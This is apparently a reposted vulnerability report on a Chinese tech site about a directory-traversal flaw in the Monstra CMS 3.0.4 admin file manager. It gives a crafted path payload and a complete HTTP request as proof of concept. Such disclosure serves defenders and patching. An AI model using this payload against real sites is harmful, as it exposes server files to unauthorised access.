溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

monstra 3.0.4 目錄瀏覽

發(fā)布時間:2020-06-07 00:04:42 來源:網(wǎng)絡(luò) 閱讀:3182 作者:wx5b0b88843cb2a 欄目:安全技術(shù)

monstra 3.0.4 目錄瀏覽

visit:http://172.16.173.238/monstra-3.0.4/admin/index.php?id=filesmanager&path=uploads/.......//./.......//./.......//./.......//./.......//./.......//./
can traversal any directory

monstra 3.0.4  目錄瀏覽

request:
`GET /monstra-3.0.4/admin/index.php?id=filesmanager&path=uploads/.......//./.......//./.......//./.......//./.......//./.......//./ HTTP/1.1
Host: 172.16.173.238
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=ph683h01pp9m9pbbi3of3bipm5; _ga=GA1.1.292621617.1535549034; _gid=GA1.1.1816700239.1535549034
Connection: close
Upgrade-Insecure-Requests: 1

`
monstra 3.0.4  目錄瀏覽

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI